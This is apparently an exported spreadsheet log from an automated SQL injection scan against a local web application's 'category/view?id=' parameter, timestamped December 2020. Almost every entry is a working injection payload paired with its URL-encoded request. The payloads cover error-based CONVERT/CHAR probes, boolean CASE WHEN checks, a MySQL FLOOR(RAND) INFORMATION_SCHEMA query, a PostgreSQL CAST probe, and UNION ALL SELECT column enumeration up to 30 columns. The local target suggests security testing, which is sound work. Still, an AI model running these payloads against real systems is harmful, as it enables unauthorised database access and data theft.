    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#]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</si>
  <si>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http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#]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</si>
  <si>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http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT NULL ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:11 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:12 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:13 ICT 2020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</si>
  <si>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</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))]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</si>
  <si>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</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(SELECT%20CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(5650=5650)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))]</t>
  </si>
  <si>
    <t>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</t>
  </si>
  <si>
    <t>[ AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%20(SELECT%204523%20FROM(SELECT%20COUNT(*),CONCAT(0x716a7a6a71,(SELECT%20(ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)</t>
  </si>
  <si>
    <t>[ AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX']</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:14 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:15 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:16 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:17 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:18 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- ]</t>
  </si>
  <si>
